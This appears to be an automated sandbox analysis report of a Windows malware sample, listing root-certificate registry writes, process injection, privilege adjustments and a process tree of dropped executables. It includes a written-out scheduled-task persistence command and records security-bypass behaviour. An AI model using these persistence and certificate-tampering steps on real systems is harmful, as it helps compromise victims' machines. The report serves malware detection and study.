Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2260	288c47bbc1871b439df19ff4df68f076.exe
2656	u1f4.0.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
2432	288c47bbc1871b439df19ff4df68f076.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
2656	u1f4.0.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
2896	csrss.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
2896	csrss.exe
1272	injector.exe
2896	csrss.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe
1272	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
480	Process not Found

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2260	288c47bbc1871b439df19ff4df68f076.exe
Token: SeImpersonatePrivilege	2260	288c47bbc1871b439df19ff4df68f076.exe
Token: SeSystemEnvironmentPrivilege	2896	csrss.exe
Token: SeSecurityPrivilege	2296	sc.exe
Token: SeSecurityPrivilege	2296	sc.exe
Token: SeLockMemoryPrivilege	2108	wup.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2108	wup.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2208	u1f4.1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 1840	2140	288c47bbc1871b439df19ff4df68f07776.exe	28
PID 2140 wrote to memory of 2260	2140	288c47bbc1871b439df19ff4df68f07776.exe	29
PID 2140 wrote to memory of 2260	2140	288c47bbc1871b439df19ff4df68f07776.exe	29
PID 2140 wrote to memory of 2260	2140	288c47bbc1871b439df19ff4df68f07776.exe	29
PID 2140 wrote to memory of 2260	2140	288c47bbc1871b439df19ff4df68f07776.exe	29
PID 1840 wrote to memory of 2656	1840	InstallSetup_four.exe	34
PID 1840 wrote to memory of 2656	1840	InstallSetup_four.exe	34
PID 1840 wrote to memory of 2656	1840	InstallSetup_four.exe	34
PID 1840 wrote to memory of 2656	1840	InstallSetup_four.exe	34
PID 1840 wrote to memory of 2208	1840	InstallSetup_four.exe	36
PID 1840 wrote to memory of 2208	1840	InstallSetup_four.exe	36
PID 1840 wrote to memory of 2208	1840	InstallSetup_four.exe	36
PID 1840 wrote to memory of 2208	1840	InstallSetup_four.exe	36
PID 2432 wrote to memory of 2772	2432	288c47bbc1871b439df19ff4df68f076.exe	41
PID 2432 wrote to memory of 2772	2432	288c47bbc1871b439df19ff4df68f076.exe	41
PID 2432 wrote to memory of 2772	2432	288c47bbc1871b439df19ff4df68f076.exe	41
PID 2432 wrote to memory of 2772	2432	288c47bbc1871b439df19ff4df68f076.exe	41
PID 2772 wrote to memory of 1644	2772	cmd.exe	40
PID 2772 wrote to memory of 1644	2772	cmd.exe	40
PID 2772 wrote to memory of 1644	2772	cmd.exe	40
PID 2432 wrote to memory of 2896	2432	288c47bbc1871b439df19ff4df68f076.exe	42
PID 2432 wrote to memory of 2896	2432	288c47bbc1871b439df19ff4df68f076.exe	42
PID 2432 wrote to memory of 2896	2432	288c47bbc1871b439df19ff4df68f076.exe	42
PID 2432 wrote to memory of 2896	2432	288c47bbc1871b439df19ff4df68f076.exe	42
PID 2208 wrote to memory of 1848	2208	u1f4.1.exe	43
PID 2208 wrote to memory of 1848	2208	u1f4.1.exe	43
PID 2208 wrote to memory of 1848	2208	u1f4.1.exe	43
PID 2208 wrote to memory of 1848	2208	u1f4.1.exe	43
PID 1848 wrote to memory of 1548	1848	cmd.exe	46
PID 1848 wrote to memory of 1548	1848	cmd.exe	46
PID 1848 wrote to memory of 1548	1848	cmd.exe	46
PID 1848 wrote to memory of 1548	1848	cmd.exe	46
PID 1848 wrote to memory of 1392	1848	cmd.exe	47
PID 1848 wrote to memory of 1392	1848	cmd.exe	47
PID 1848 wrote to memory of 1392	1848	cmd.exe	47
PID 1848 wrote to memory of 1392	1848	cmd.exe	47
PID 2896 wrote to memory of 1272	2896	csrss.exe	54
PID 2896 wrote to memory of 1272	2896	csrss.exe	54
PID 2896 wrote to memory of 1272	2896	csrss.exe	54
PID 2896 wrote to memory of 1272	2896	csrss.exe	54
PID 1544 wrote to memory of 488	1544	patch.exe	58
PID 1544 wrote to memory of 488	1544	patch.exe	58
PID 1544 wrote to memory of 488	1544	patch.exe	58
PID 1544 wrote to memory of 2032	1544	patch.exe	60
PID 1544 wrote to memory of 2032	1544	patch.exe	60
PID 1544 wrote to memory of 2032	1544	patch.exe	60
PID 1544 wrote to memory of 932	1544	patch.exe	62
PID 1544 wrote to memory of 932	1544	patch.exe	62
PID 1544 wrote to memory of 932	1544	patch.exe	62
PID 1544 wrote to memory of 2220	1544	patch.exe	64
PID 1544 wrote to memory of 2220	1544	patch.exe	64
PID 1544 wrote to memory of 2220	1544	patch.exe	64
PID 1544 wrote to memory of 636	1544	patch.exe	70
PID 1544 wrote to memory of 636	1544	patch.exe	70
PID 1544 wrote to memory of 636	1544	patch.exe	70
PID 1544 wrote to memory of 2324	1544	patch.exe	68
PID 1544 wrote to memory of 2324	1544	patch.exe	68
PID 1544 wrote to memory of 2324	1544	patch.exe	68

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f07776.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f07776.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u1f4.0.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2656
- - C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u1f4.1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1848
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:1392
- C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
  "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2260
- - C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
    "C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
    3⤵
    - Windows security bypass
    - Executes dropped EXE
    - Loads dropped DLL
    - Windows security modification
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
